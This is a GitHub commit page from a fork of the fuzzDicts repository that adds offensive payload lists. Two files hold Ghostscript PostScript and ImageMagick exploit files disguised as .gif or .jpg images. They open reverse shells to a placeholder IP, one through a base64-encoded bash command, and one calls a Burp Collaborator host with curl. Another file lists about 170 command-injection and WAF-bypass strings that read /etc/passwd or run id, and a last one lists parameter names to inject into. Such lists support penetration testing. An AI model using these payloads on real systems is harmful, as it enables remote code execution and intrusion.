forked from TheKingOfDuck/fuzzDicts
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
61c2f75
commit 4bf3d8b
Showing
18 changed files
with
740 additions
and
0 deletions.
There are no files selected for viewing
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,34 @@ | ||
| 1. | ||
| %!PS | ||
| userdict /setpagedevice undef | ||
| legal | ||
| { null restore } stopped { pop } if | ||
| legal | ||
| mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops | ||
|
|
||
| 2. | ||
| %!PS | ||
| 0 1 300367 {} for | ||
| {save restore} stopped {} if | ||
| (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') (w) file | ||
|
|
||
| 3. | ||
| %!PS | ||
| userdict /setpagedevice undef | ||
| save | ||
| legal | ||
| { null restore } stopped { pop } if | ||
| { legal } stopped { pop } if | ||
| restore | ||
| mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops | ||
|
|
||
| 4. | ||
| %!PS | ||
| userdict /setpagedevice undef | ||
| legal | ||
| { null restore } stopped { pop } if | ||
| legal | ||
| mark /OutputFile (%pipe%curl http://inputburpcollaborator) currentdevice putdeviceprops | ||
|
|
||
| Note: | ||
| Save as test.gif or test.jpg |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,36 @@ | ||
| 1. | ||
| push graphic-context | ||
| viewbox 0 0 640 480 | ||
| fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL3lvdXJpcC95b3VycG9ydCAwPiYx | base64 -d | bash`"||id " )' | ||
| pop graphic-context | ||
|
|
||
| 2. | ||
| push graphic-context | ||
| encoding "UTF-8" | ||
| viewbox 0 0 1 1 | ||
| affine 1 0 0 1 0 0 | ||
| push graphic-context | ||
| image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/yourip/yourport 0<&1 2>&1' | ||
| pop graphic-context | ||
| pop graphic-context | ||
|
|
||
| 3. | ||
| %!PS | ||
| userdict /setpagedevice undef | ||
| save | ||
| legal | ||
| { null restore } stopped { pop } if | ||
| { legal } stopped { pop } if | ||
| restore | ||
| mark /OutputFile (%pipe%ncat yourip yourport -e /bin/sh) currentdevice putdeviceprops | ||
|
|
||
| 4. | ||
| %!PS | ||
| userdict /setpagedevice undef | ||
| legal | ||
| { null restore } stopped { pop } if | ||
| legal | ||
| mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops | ||
|
|
||
| Note: | ||
| Save as test.gif or test.jpg |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,174 @@ | ||
| ' | ||
| whoami | ||
| ' | ||
| " | ||
| whoami | ||
| " | ||
| ` | ||
| whoami | ||
| ` | ||
| ; | ||
| whoami | ||
| ; | ||
| , | ||
| whoami | ||
| , | ||
| | | ||
| whoami | ||
| | | ||
| whoami | ||
| | | ||
| \ | ||
| whoami | ||
| '' | ||
| whoami | ||
| '' | ||
| * | ||
| whoami | ||
| * | ||
| whoami | ||
| * | ||
| ( | ||
| whoami | ||
| ) | ||
| \ | ||
| whoami | ||
| \ | ||
| & | ||
| whoami | ||
| & | ||
| ", | ||
| system('ls') | ||
| ;" | ||
| |uname -a+||a+#'+|ls+-la|a+#|"+|ls+-la||a+# Rce waf bypass | ||
| ",system('ls');" double quote Rce filter bypass | ||
| ${@system("id")} eval code bypass | ||
| ${@phpinfo()} | ||
| ;phpinfo(); | ||
| ;phpinfo | ||
| ;system('cat%20/etc/passwd') | ||
| ;system('id') | ||
| $(id) | ||
| ;${@print(md5(whoami))} | ||
| ;${@print(md5("whoami"))} | ||
| $;id | ||
| $(`cat /etc/passwd`) | ||
| {{ get_user_file("/etc/passwd") }} | ||
| <!--#exec cmd="id;--> | ||
| system('cat /etc/passwd'); | ||
| <?php system("cat /etc/passwd");?> | ||
| php -r 'var_dump(exec("id"));' | ||
| <!--#exec%20cmd="id;--> | ||
| /bin$u/bash$u <ip> <port> | ||
| cat$u+/etc$u/passwd$u | ||
| ";cat+/etc/passwd+# | ||
| ;+$u+cat+/etc$u/passwd$u | ||
| ;+$u+cat+/etc$u/passwd+\# | ||
| /???/??t+/???/??ss?? | ||
| /?in/cat+/et?/passw? | ||
| ;+cat+/e'tc/pass'wd | ||
| c\\a\\t+/et\\c/pas\\swd | ||
| cat /etc$u/passwd | ||
| (sy.(st).em)(whoami); | ||
| ;cat+/etc/passwd | ||
| ;cat+/etc/passwd+# | ||
| ;cat$u+/etc$u/passwd$u | ||
| ;cat%20/etc/passwd | ||
| ;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd | ||
| ;cat$u /etc$u/passwd$u | ||
| ;{cat,/etc/passwd} | ||
| ;cat</etc/passwd | ||
| ;cat$IFS/etc/passwd | ||
| ;echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd | ||
| ;/usr/bin/id; | ||
| |cat%20/etc/passwd | ||
| |cat /e${hahaha}tc/${heywaf}pas${catchthis}swd | ||
| |cat$u /etc$u/passwd$u | ||
| |{cat,/etc/passwd} | ||
| |cat</etc/passwd | ||
| |cat$IFS/etc/passwd | ||
| |echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd | ||
| |/usr/bin/id| | ||
| ||cat%20/etc/passwd | ||
| ||cat /e${hahaha}tc/${heywaf}pas${catchthis}swd | ||
| ||cat$u /etc$u/passwd$u | ||
| ||{cat,/etc/passwd} | ||
| ||cat</etc/passwd | ||
| ||cat$IFS/etc/passwd | ||
| ||echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd | ||
| ||/usr/bin/id|| | ||
| &&cat%20/etc/passwd | ||
| &&cat /e${hahaha}tc/${heywaf}pas${catchthis}swd | ||
| &&cat$u /etc$u/passwd$u | ||
| &&{cat,/etc/passwd} | ||
| &&cat</etc/passwd | ||
| &&cat$IFS/etc/passwd | ||
| &&echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd | ||
| &&/usr/bin/id&& | ||
| &cat%20/etc/passwd | ||
| &cat /e${hahaha}tc/${heywaf}pas${catchthis}swd | ||
| &cat$u /etc$u/passwd$u | ||
| &{cat,/etc/passwd} | ||
| &cat</etc/passwd | ||
| &cat$IFS/etc/passwd | ||
| &echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd | ||
| &/usr/bin/id& | ||
| `cat%20/etc/passwd` | ||
| `cat /e${hahaha}tc/${heywaf}pas${catchthis}swd` | ||
| `cat$u /etc$u/passwd$u` | ||
| `{cat,/etc/passwd}` | ||
| `cat</etc/passwd` | ||
| `cat$IFS/etc/passwd` | ||
| `echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd` | ||
| `/usr/bin/id` | ||
| $(cat%20/etc/passwd) | ||
| $(cat /e${hahaha}tc/${heywaf}pas${catchthis}swd) | ||
| $(cat$u /etc$u/passwd$u) | ||
| $({cat,/etc/passwd}) | ||
| $(cat</etc/passwd) | ||
| $(cat$IFS/etc/passwd) | ||
| $(echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd) | ||
| $(/usr/bin/id) | ||
| id||whoami; | ||
| id|whoami; | ||
| id&&whoami; | ||
| id&whoami; | ||
| 127.0.0.1;ls | ||
| 127.0.0.1;i"d | ||
| ;unam"e${IFS}-a | ||
| ;l"s${IFS}-la | ||
| 'i'd | ||
| "i"d | ||
| \u\n\a\m\e \-\a | ||
| cat$u /etc$u/passwd$u | ||
| w${u}h${u}o${u}a${u}m${u}i | ||
| i$(u)d | ||
| i`u`d | ||
| {uname,-a} | ||
| cat${IFS}/etc/passwd | ||
| cat$IFS/etc/passwd | ||
| IFS=];b=cat]/etc/passwd;$b | ||
| IFS=,;`cat<<<cat,/etc/passwd` | ||
| uname${IFS}-a | ||
| cat ${HOME:0:1}etc${HOME:0:1}passwd | ||
| cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd | ||
| cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss?? | ||
| cat${IFS}${PATH%%u*}etc${PATH%%u*}passwd | ||
| ${PATH##*s????}${PATH%%u*}c??${IFS}${PATH%%u*}e??${PATH%%u*}??ss?? | ||
| ${PATH##*s????}${PATH%%u*}ca${u}t${IFS}${PATH%%u*}et${u}c${PATH%%u*}pas${u}swd | ||
| ${PATH##*s????}${PATH%%u*}bas${u}h${IFS}${PHP_CFLAGS%%f*}c${IFS}l${u}s | ||
| ${PATH:0:1}bi?${PATH:0:1}ca?${IFS}${PATH:0:1}et?${PATH:0:1}??sswd | ||
| tail${IFS}${APACHE_CONFDIR%${APACHE_CONFDIR#?}}et?${APACHE_CONFDIR%${APACHE_CONFDIR#?}}pas?wd | ||
| c${a}at${IFS}${APACHE_CONFDIR%apache2}pas${s}swd | ||
| ca${jjj}t${IFS}${APACHE_RUN_DIR%???????????????}et${jjj}c${APACHE_RUN_DIR%???????????????}pas${jjj}swd | ||
| c${u}at${IFS}${PHP_INI_DIR%%u*p}e${u}tc${PHP_INI_DIR%%u*p}p${u}asswd | ||
| cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"` | ||
| cat `xxd -r -p <<< 2f6574632f706173737764` | ||
| cat `xxd -r -ps <(echo 2f6574632f706173737764)` | ||
| 1;uname${IFS}-a | ||
| 1;uname${IFS}-a;# | ||
| 1;uname${IFS}-a;#${IFS}' | ||
| 1;uname${IFS}-a;#${IFS}'; | ||
| /*$(id)`id` | ||
| /*$(id)`id``*/-id-'/*$(id)`id` #*/-id||'"||id||"/*`*/ | ||
| /*$(id)`id``*/id'/*$(id)`id` #*/id||'"||id||"/*`*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,5 @@ | ||
|
|
||
|
|
||
|
|
||
|
|
||
| ### reference: https://ansar0047.medium.com/remote-code-execution-unix-and-windows-4ed3367158b3 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,46 @@ | ||
| exec={payload} | ||
| command={payload} | ||
| execute{payload} | ||
| ping={payload} | ||
| include={payload} | ||
| exclude={payload} | ||
| jump={payload} | ||
| code={payload} | ||
| reg={payload} | ||
| do={payload} | ||
| func={payload} | ||
| arg={payload} | ||
| option={payload} | ||
| load={payload} | ||
| process={payload} | ||
| step={payload} | ||
| read={payload} | ||
| function={payload} | ||
| req={payload} | ||
| feature={payload} | ||
| exe={payload} | ||
| module={payload} | ||
| payload={payload} | ||
| run={payload} | ||
| print={payload} | ||
| email={payload} | ||
| id={payload} | ||
| username={payload} | ||
| user={payload} | ||
| to={payload} | ||
| from={payload} | ||
| search={payload} | ||
| query={payload} | ||
| q={payload} | ||
| s={payload} | ||
| shopId={payload} | ||
| blogId={payload} | ||
| phone={payload} | ||
| mode={payload} | ||
| next={payload} | ||
| firstname={payload} | ||
| lastname={payload} | ||
| locale={payload} | ||
| cmd={payload} | ||
| sys={payload} | ||
| system={payload} |
Oops, something went wrong.